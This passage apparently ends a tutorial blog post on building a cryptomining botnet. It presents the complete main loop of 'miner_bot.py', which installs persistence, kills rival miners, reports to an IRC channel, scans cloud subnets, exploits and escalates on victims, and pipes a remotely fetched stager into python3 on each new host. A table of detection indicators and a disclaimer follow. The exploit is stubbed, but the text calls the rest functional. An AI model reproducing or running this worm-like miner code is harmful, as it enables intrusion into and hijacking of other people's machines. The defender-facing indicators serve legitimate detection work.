The tradeoff is that Discord can (and does) terminate webhook URLs reported for abuse, so IRC gives the operator more control at the cost of slightly more setup.
Full scenario bot – miner_bot.py
Putting it all together: this is the full main loop that ties every component above into a single script. The exploit step is stubbed, but every other part is functional.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# miner_bot.py
import os
import random
import sys
import time
# -- imports from the modules above (collapsed here for readability) --
# from spread_scan import scan_subnet, pick_random_cloud_subnet
# from exploit import exploit, try_privesc, ExploitError
# from irc_report import irc_report
BOT_ID = os.urandom(4).hex() # unique ID assigned at infection time
SCAN_INTERVAL = 600 # seconds between spread attempts
REPORT_INTERVAL = 300 # seconds between hashrate reports
def main():
install_persistence()
kill_competing_miners(os.getpid())
miner = start_miner()
irc_report(f"[{BOT_ID}] online -- miner pid {miner.pid}")
last_scan = 0
last_report = 0
while True:
now = time.time()
# periodic spread scan
if now - last_scan >= SCAN_INTERVAL:
subnet = pick_random_cloud_subnet()
hits = scan_subnet(subnet)
for ip, ports in hits:
for port in ports:
try:
run_cmd = exploit(ip, port)
# if we got a shell, try to escalate and then install
# the stager on the new host
try_privesc(run_cmd)
# fetch and execute stager on the remote host via run_cmd
run_cmd(
"curl -s http://127.0.0.1:8000/stager.py | python3"
)
irc_report(f"[{BOT_ID}] new bot: {ip}:{port}")
break # one successful exploit per host is enough
except (NotImplementedError, Exception):
pass
last_scan = now
# periodic hashrate report
if now - last_report >= REPORT_INTERVAL:
# xmrig exposes a JSON API on localhost:18088 when --http-enabled is set
# here we just report that we're alive; a real bot would parse the API
irc_report(f"[{BOT_ID}] alive -- uptime {int(now - last_report)}s")
last_report = now
time.sleep(10)
if __name__ == "__main__":
main()
Detection indicators
From a defender's standpoint this is what to look for on a suspected host and on the network:
| Indicator | Where to look |
|---|---|
| xmrig or unknown high-CPU process | ps aux, top, htop |
| Outbound TCP to port 4444 (mining pool) | ss -tnp, firewall egress logs |
| Outbound TCP to port 6667 (IRC) | ss -tnp, firewall egress logs |
Outbound HTTPS to discord.com from a server |
Firewall egress logs, unusual for most servers |
| New or unfamiliar cron entries | crontab -l for all users, /etc/cron.d/ |
| New systemd user units | systemctl --user list-units --all |
Unknown files in ~/Library/LaunchAgents/ |
ls -la ~/Library/LaunchAgents/ |
| Mass outbound TCP SYNs to port 22, 2375, 6379 | Network flow logs, IDS alerts |
| Processes named after system services with unusual parent PIDs | ps auxf (forest view) |
/tmp or /dev/shm executables |
ls -la /tmp /dev/shm |
The last two are particularly reliable: real system daemons don't spawn from a Python
interpreter, and legitimate software doesn't execute binaries out of /tmp.
What's missing from this implementation (intentionally)
This is a minimal educational demo. Real botnets add layers this post doesn't cover:
- Encryption – all traffic here is plaintext. Real C2 traffic uses TLS or custom obfuscated protocols.
- Authentication – any process that knows the port can connect as an operator or register as a bot. A real C2 uses a shared secret or certificate.
- Evasion – real bots disguise their traffic (HTTP headers, domain fronting, sleeping randomly to avoid beaconing detection).
- Resilience – a single C2 server is a single point of failure. Real operations use multiple C2s, redirectors, or P2P meshes.
- Bot propagation – getting the bot binary onto a machine in the first place is a completely separate problem involving exploit delivery, phishing, or physical access.
Understanding what's missing is as important as understanding what's here – these are the gaps defenders look to close and the gaps attackers work to exploit.
Disclaimer
This post is strictly educational. The code demonstrates C2 architecture concepts for learning and research purposes. Deploying this – or anything derived from it – against systems you do not own is illegal under the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws in most countries. The author takes no responsibility for misuse.
